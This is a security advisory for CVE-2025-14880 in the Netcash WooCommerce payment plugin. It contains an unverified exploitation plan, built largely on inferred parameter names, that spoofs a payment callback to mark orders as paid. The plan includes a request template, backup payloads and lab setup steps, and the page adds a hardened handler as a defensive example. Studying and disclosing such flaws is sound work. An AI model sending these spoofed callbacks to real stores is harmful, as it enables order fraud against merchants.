CVE-2025-14880

Netcash WooCommerce Payment Gateway <= 4.1.3 - Missing Authorization to Unauthenticated Order Status Modification

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 4.1.4
Time to patch: 2d

Description

The Netcash WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_return_url function in all versions up to, and including, 4.1.3. This makes it possible for unauthenticated attackers to mark any WooCommerce order as processing/completed.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 4.1.3
Published: January 13, 2026
Last updated: January 15, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified

This exploitation research plan focuses on CVE-2025-14880, a missing authorization vulnerability in the Netcash WooCommerce Payment Gateway plugin.


1. Vulnerability Summary

The Netcash WooCommerce Payment Gateway plugin (versions <= 4.1.3) contains a vulnerability where the handle_return_url function fails to perform sufficient authorization or authenticity checks. This function is designed to process callback notifications (Webhooks/IPNs) from the Netcash payment server. Because the function is accessible unauthenticated and lacks a signature or secret key verification, an attacker can spoof a successful payment notification to manipulate the status of any WooCommerce order.

2. Attack Vector Analysis

  • Endpoint: The vulnerability is triggered via the WooCommerce API callback endpoint.
  • URL Pattern: http://<target>/index.php?wc-api=WC_Gateway_Netcash (or a similar class-based slug, inferred from typical WooCommerce gateway implementations).
  • Method: Likely POST or GET (Netcash typically uses POST for IPN/callbacks).
  • Authentication: Unauthenticated (No WordPress login or nonce required).
  • Preconditions:
    1. The Netcash Payment Gateway must be installed and active (though not necessarily fully configured with real API keys).
    2. At least one WooCommerce order must exist in the system (e.g., in 'pending' status).

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers a WooCommerce API hook, for example add_action( 'woocommerce_api_wc_gateway_netcash', array( $this, 'handle_return_url' ) ).
  2. Request Handling: When a request hits ?wc-api=wc_gateway_netcash, WooCommerce routes it to handle_return_url().
  3. Data Extraction: The function extracts the Order ID from the request parameters (likely m_payment_id or order_id (inferred)).
  4. Status Update: The function checks for a "success" indicator in the request (likely TransactionAccepted or status (inferred)).
  5. Sink: Without verifying if the request originated from Netcash's servers or checking a shared secret, the code calls:
    • $order = wc_get_order( $order_id );
    • $order->payment_complete(); or $order->update_status( 'processing' );
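The checks the inferred flow above is missing, shown as an added example of a hardened callback handler. This is hypothetical code written for this page, not the plugin's own code or Netcash's actual protocol: the HMAC-over-body signature scheme, the header name X-Provider-Signature, the amount and txn_id parameters and the class name are all assumptions; m_payment_id is the order-reference parameter named in this advisory.

```php
<?php
// Hypothetical hardened WooCommerce gateway callback (added example, not the
// plugin's code). Assumes the payment provider signs each notification with an
// HMAC-SHA256 over the raw POST body using a shared secret stored in the gateway
// settings; header and parameter names are assumptions for illustration.
class WC_Gateway_Example_Callback {

    private $shared_secret; // loaded from gateway settings, never hard-coded

    public function __construct( $shared_secret ) {
        $this->shared_secret = $shared_secret;
        // Same kind of unauthenticated entry point as the vulnerable plugin uses.
        add_action( 'woocommerce_api_wc_gateway_example', array( $this, 'handle_return_url' ) );
    }

    public function handle_return_url() {
        $raw = file_get_contents( 'php://input' );
        $sig = isset( $_SERVER['HTTP_X_PROVIDER_SIGNATURE'] ) ? $_SERVER['HTTP_X_PROVIDER_SIGNATURE'] : '';

        // 1. Authenticity: reject any notification not signed with the shared secret.
        //    This is the check CVE-2025-14880 describes as missing; hash_equals()
        //    compares in constant time.
        $expected = hash_hmac( 'sha256', $raw, $this->shared_secret );
        if ( '' === $sig || ! hash_equals( $expected, $sig ) ) {
            wp_die( 'invalid signature', '', array( 'response' => 403 ) );
        }

        parse_str( $raw, $params );
        $order_id = isset( $params['m_payment_id'] ) ? absint( $params['m_payment_id'] ) : 0;
        $order    = wc_get_order( $order_id );

        // 2. State check: only orders that still await payment may be completed,
        //    so a replayed notification cannot re-touch a finished order.
        if ( ! $order || ! $order->needs_payment() ) {
            wp_die( 'order not payable', '', array( 'response' => 400 ) );
        }

        // 3. Integrity: the paid amount must match what the store expects.
        $amount = isset( $params['amount'] ) ? (float) $params['amount'] : -1.0;
        if ( abs( $amount - (float) $order->get_total() ) > 0.005 ) {
            $order->add_order_note( 'Callback amount mismatch; payment not applied.' );
            wp_die( 'amount mismatch', '', array( 'response' => 400 ) );
        }

        // 4. Only now mark the order paid, recording the provider's reference.
        $txn_id = isset( $params['txn_id'] ) ? sanitize_text_field( wp_unslash( $params['txn_id'] ) ) : '';
        $order->payment_complete( $txn_id );
        status_header( 200 );
        exit;
    }
}
```

Restricting the callback route to the provider's published source addresses at the web server or firewall is a complementary control, but it does not replace the signature check, which is what ties a notification to a specific order and amount.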

4. Nonce Acquisition Strategy

This vulnerability resides in a WC_API callback. By design, WooCommerce API callbacks (used for external payment notifications) do not use WordPress nonces because the request originates from an external server (Netcash) that cannot possess a WordPress session-based nonce.

No nonce is required for this exploit.

5. Exploitation Strategy

Step 1: Discover the Order ID

You need a valid WooCommerce Order ID. In a test environment, this is easy. In a real-world scenario, Order IDs are often sequential.

Step 2: Construct the Malicious Callback

Based on Netcash (Pay Now) documentation and typical gateway logic, the callback payload likely requires an Order ID and a success flag.

  • Action URL: http://<target>/index.php?wc-api=WC_Gateway_Netcash
  • Payload (POST Body):
    m_payment_id=ORDER_ID&TransactionAccepted=true
    
    (Note: Parameters like m_payment_id and TransactionAccepted are common in Netcash integrations but should be verified by grepping the source for $_POST or $_GET inside the handle_return_url function.)

Step 3: Send the Exploit Request

Use the http_request tool to send the spoofed notification.

Request Template:

POST /index.php?wc-api=WC_Gateway_Netcash HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

m_payment_id=123&TransactionAccepted=true

6. Test Data Setup

Before running the exploit, ensure the environment is ready:

  1. Install WooCommerce.
  2. Install Netcash Plugin: Ensure netcash-pay-now-payment-gateway-for-woocommerce version 4.1.3 is active.
  3. Create a Product:
    • wp post create --post_type=product --post_title="Test Product" --post_status=publish
  4. Create a Pending Order:
    • Use the wp wc order create command (WooCommerce CLI commands run through the REST API and need --user=<admin-user> for permission):
    • wp wc order create --status=pending --customer_id=0 --line_items='[{"product_id": <ID>, "quantity": 1}]' --user=<admin-user>
  5. Note the Order ID returned by the creation command.

7. Expected Results

  • The HTTP request should return a 200 OK (WooCommerce often returns 200 even if processing fails, but the order status is the key indicator).
  • The targeted WooCommerce order's status should change from 'Pending Payment' to 'Processing' or 'Completed'.

8. Verification Steps

After sending the request, verify the order status using WP-CLI:

# Replace <ORDER_ID> with the ID of the order you targeted and <admin-user>
# with a user allowed to read orders (wp wc commands require --user)
wp wc order get <ORDER_ID> --fields=status --format=json --user=<admin-user>

If the status is processing or completed, the exploit is successful.

9. Alternative Approaches

If m_payment_id or TransactionAccepted do not trigger the logic, perform the following code audits via CLI:

  1. Identify the callback function:
    grep -rn "handle_return_url" /var/www/html/wp-content/plugins/netcash-pay-now-payment-gateway-for-woocommerce/
  2. Identify the request parameters read in that function (the pattern matches $_POST, $_GET and $_REQUEST without the stray spaces that would otherwise require a leading blank):
    grep -nE '\$_(POST|GET|REQUEST)' [FILE_PATH_FROM_STEP_1]
  3. Check for required status strings:
    Search for string comparisons like == 'ACCEPTED' or == '1' within the same function.

Backup Payload (Inferred variations):

  • ?wc-api=WC_Gateway_Netcash&order_id=ORDER_ID&status=success
  • ?wc-api=WC_Gateway_Netcash&Reference=ORDER_ID&Reason=Success
